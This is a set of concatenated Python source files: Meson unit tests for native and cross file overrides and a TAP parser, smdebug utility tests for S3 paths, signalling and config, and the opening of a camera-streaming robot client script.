f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
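# e.g. helper_create_binary_wrapper('gcc', version='1.2345') yields a script
# that prints '1.2345' when invoked with --version and forwards any other
# arguments straight to gcc.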
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('llvm-config not installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
# We may not have python2 installed; check for it via pkg-config first
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so let's not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed at testing overrides from cross files.
"""
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
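# The cases below feed the parser minimal TAP streams; for reference, a TAP
# document is a plan line plus test lines with optional directives, e.g.:
#   1..2
#   ok 1 first
#   not ok 2 second # TODO known flaky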
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
Check that the Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleClang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
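# e.g. _clang_at_least(cc, '>=7.0', '>=10.0') would require Clang 7 upstream
# but AppleClang 10, since Apple's versioning runs ahead of upstream's.
# (The version strings here are illustrative only.)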
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
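# e.g. convert_args(['-v', 'AllPlatformTests.test_foo']) returns
# ['-v', '-k', 'AllPlatformTests and test_foo'].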
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
raise SystemExit(main())
|
test_utils.py | # Standard Library
import os
import shutil
import tempfile
import time
from multiprocessing import Manager, Process
from os import makedirs
# Third Party
import pytest
# First Party
from smdebug.core.access_layer import (
DEFAULT_GRACETIME_FOR_RULE_STOP_SEC,
ENV_RULE_STOP_SIGNAL_FILENAME,
check_dir_exists,
is_rule_signalled_gracetime_passed,
)
from smdebug.core.collection_manager import CollectionManager
from smdebug.core.index_reader import ReadIndexFilesCache
from smdebug.core.json_config import (
DEFAULT_SAGEMAKER_OUTDIR,
add_collections_to_manager,
collect_hook_config_params,
get_include_collections,
get_json_config_as_dict,
)
from smdebug.core.locations import IndexFileLocationUtils
from smdebug.core.utils import SagemakerSimulator, is_first_process, is_s3
def test_normal():
rval = is_s3("a/b/c")
assert not rval[0]
def test_s3():
rval = is_s3("s3://a/b")
assert rval[0]
assert rval[1] == "a"
assert rval[2] == "b"
def test_s3_noprefix():
rval = is_s3("s3://a")
assert rval[0]
assert rval[1] == "a"
assert rval[2] == ""
def test_s3_noprefix2():
rval = is_s3("s3://a/")
assert rval[0]
assert rval[1] == "a"
assert rval[2] == ""
def test_check_dir_not_exists_local():
check_dir_exists("/home/ubuntu/asasdas")
def test_check_dir_exists():
# check_dir_exists should raise when the directory already exists
with pytest.raises(Exception):
check_dir_exists("/home/ubuntu/")
def test_check_dir_not_exists_s3():
check_dir_exists("s3://smdebug-testing/resources/doesnotexist")
def test_check_dir_exists_s3():
# This file should exist in the bucket for proper testing
check_dir_exists("s3://smdebug-testing/resources/exists")
def setup_rule_stop_file(temp_file, time_str, monkeypatch, write=True):
dir = os.path.dirname(temp_file.name)
rel_filename = os.path.relpath(temp_file.name, start=dir)
if write is True:
# write timestamp in temp file
temp_file.write(str(time_str))
temp_file.flush()
monkeypatch.setenv(ENV_RULE_STOP_SIGNAL_FILENAME, rel_filename)
def test_is_rule_signalled_gracetime_not_passed(monkeypatch):
temp_file = tempfile.NamedTemporaryFile(mode="w+")
time_str = str(int(time.time()))
setup_rule_stop_file(temp_file, time_str, monkeypatch)
dir = os.path.dirname(temp_file.name)
assert is_rule_signalled_gracetime_passed(dir) is False
def test_is_rule_signalled_gracetime_passed(monkeypatch):
temp_file = tempfile.NamedTemporaryFile(mode="w+")
time_str = str(int(time.time() - 2 * DEFAULT_GRACETIME_FOR_RULE_STOP_SEC))
setup_rule_stop_file(temp_file, time_str, monkeypatch)
dir = os.path.dirname(temp_file.name)
assert is_rule_signalled_gracetime_passed(dir) is True
def test_is_rule_signalled_no_env_var_set(monkeypatch):
assert is_rule_signalled_gracetime_passed("/fake-file") is False
def test_is_rule_signalled_no_signal_file(monkeypatch):
temp_file = tempfile.NamedTemporaryFile(mode="w+")
time_str = str(int(time.time() - 2 * DEFAULT_GRACETIME_FOR_RULE_STOP_SEC))
setup_rule_stop_file(temp_file, time_str, monkeypatch, write=False)
dir = os.path.dirname(temp_file.name)
# env variable is set, remove the file.
temp_file.close()
assert is_rule_signalled_gracetime_passed(dir) is False
def test_is_rule_signalled_invalid_gracetime(monkeypatch):
temp_file = tempfile.NamedTemporaryFile(mode="w+")
setup_rule_stop_file(temp_file, "Invalid_time", monkeypatch)
dir = os.path.dirname(temp_file.name)
assert is_rule_signalled_gracetime_passed(dir) is True
@pytest.mark.skip(reason="It's unclear what this is testing.")
def test_check_dir_not_exists():
with pytest.raises(Exception):
check_dir_exists("s3://smdebug-testing")
def test_index_files_cache():
"""
Test to verify that the index file cache is behaving as it should.
1. The cache should not save elements already present
2. The cache should remove its old elements when it attempts to save more
elements than its set limit.
"""
index_file_cache = ReadIndexFilesCache()
index_file_cache.add("file_1", None)
index_file_cache.add("file_1", None)
assert len(index_file_cache.lookup_set) == 1
assert index_file_cache.has_not_read("file_1") is False
assert index_file_cache.has_not_read("file_2") is True
index_file_cache.add("file_2", None)
index_file_cache.add("file_3", None)
index_file_cache.add("file_4", None)
assert len(index_file_cache.lookup_set) == 4
# Test cache eviction logic
index_file_cache.cache_limit = 2 # override cache limit
index_file_cache.add("file_5", "file_1")
assert len(index_file_cache.lookup_set) == 5 # No elements evicted
index_file_cache.add("file_6", "file_4")
assert (
len(index_file_cache.lookup_set) == 3
) # Elements in the cache will be file_4, file_5, file_6
def test_index_files_cache_insert_many_elements_in_the_first_read():
cache = ReadIndexFilesCache()
cache.cache_limit = 5
elements = ["a", "b", "c", "d", "e", "f", "g", "h"]
for e in elements:
cache.add(e, None)
# No files should be evicted because start_after_key has not been set
assert len(cache.lookup_set) == len(elements)
def test_get_prefix_from_index_file():
local_index_filepath = "/opt/ml/testing/run_1/index/000000000/000000000000_worker_0.json"
prefix = IndexFileLocationUtils.get_prefix_from_index_file(local_index_filepath)
assert prefix == "/opt/ml/testing/run_1"
s3_index_filepath = (
"s3://bucket-that-does-not-exist/run_1/index/000000000/000000000000_worker_0.json"
)
prefix = IndexFileLocationUtils.get_prefix_from_index_file(s3_index_filepath)
assert prefix == "s3://bucket-that-does-not-exist/run_1"
def test_json_params():
params_dict = get_json_config_as_dict(
json_config_path="tests/core/json_configs/all_params.json"
)
hook_params = collect_hook_config_params(params_dict)
include_collections = get_include_collections(params_dict)
coll_manager = CollectionManager()
add_collections_to_manager(coll_manager, params_dict, hook_params)
assert hook_params["include_workers"] == "one"
assert hook_params["save_all"] is True
assert coll_manager.get("weights").save_histogram is False
assert coll_manager.get("gradients").save_histogram is False
assert "weights" in include_collections
assert "gradients" in include_collections
assert len(include_collections) == 2
assert hook_params["export_tensorboard"] == True
assert hook_params["tensorboard_dir"] == "/tmp/tensorboard"
def test_json_params_sagemaker():
with SagemakerSimulator() as sim:
params_dict = get_json_config_as_dict(
json_config_path="tests/core/json_configs/all_params.json"
)
hook_params = collect_hook_config_params(params_dict)
include_collections = get_include_collections(params_dict)
coll_manager = CollectionManager()
add_collections_to_manager(coll_manager, params_dict, hook_params)
assert hook_params["include_workers"] == "one"
assert hook_params["save_all"] is True
assert coll_manager.get("weights").save_histogram is False
assert coll_manager.get("gradients").save_histogram is False
assert "weights" in include_collections
assert "gradients" in include_collections
assert len(include_collections) == 2
assert hook_params["export_tensorboard"] == True
assert hook_params["tensorboard_dir"] == sim.tensorboard_dir
@pytest.mark.parametrize("dir", [True, False])
def test_is_first_process(dir):
s3_path = "s3://this/is/a/valid/path"
assert is_first_process(s3_path)
# This section tests local path
for _ in range(10):
helper_test_is_first_process(dir)
def helper_test_is_first_process(dir):
temp_dir = tempfile.TemporaryDirectory()
path = temp_dir.name
shutil.rmtree(path, ignore_errors=True)
if dir:
makedirs(temp_dir.name)
process_list = []
def helper(fn, arg, shared_list):
shared_list.append(fn(arg))
manager = Manager()
results = manager.list()
for i in range(100):
p = Process(target=helper, args=(is_first_process, path, results))
p.start()
process_list.append(p)
for p in process_list:
p.join()
assert results.count(True) == 1, f"Failed for path: {path}"
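# Hypothetical sketch of the "exactly one winner" semantics this test demands;
# not smdebug's implementation. An O_CREAT|O_EXCL open is atomic on POSIX, so
# exactly one of the racing processes succeeds whether or not `path` pre-exists.
def first_process_sketch(path):
    if path.startswith("s3://"):
        return True  # the test treats S3 paths as always-first
    os.makedirs(path, exist_ok=True)
    try:
        fd = os.open(os.path.join(path, ".claim"), os.O_CREAT | os.O_EXCL)
    except FileExistsError:
        return False  # another process claimed this path first
    os.close(fd)
    return True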
|
client.py | import asyncio
from streaming import AsyncClient
import comms
import threading
import sys
import getopt
import tankcontrol
ip = "127.0.0.1"
port = 8084
usePiCam = False
size = 1
controller = tankcontrol.TankControl((11, 12), (15, 16))
disableMotor = False
try:
opts, args = getopt.getopt(sys.argv[1:], "ha:p:s:", [
"ip=", "port=", "size=", "usepicam", "disablemotor"])
except getopt.GetoptError:
print("ERROR: client.py -a <server ip> -p <port> -s <size> (--usepicam)")
exit()
for opt, arg in opts:
if opt == '-h':
print("client.py -a <server ip> -p <port> -s <size> (--usepicam)")
exit()
elif opt in ("-a", "--ip"):
ip = arg
elif opt in ("-p", "--port"):
port = int(arg)
elif opt in ("-s", "--size"):
size = int(arg)
elif opt == '--usepicam':
usePiCam = True
elif opt == '--disablemotor':
disableMotor = True
if not usePiCam:
import cv2
cap = cv2.VideoCapture(0)
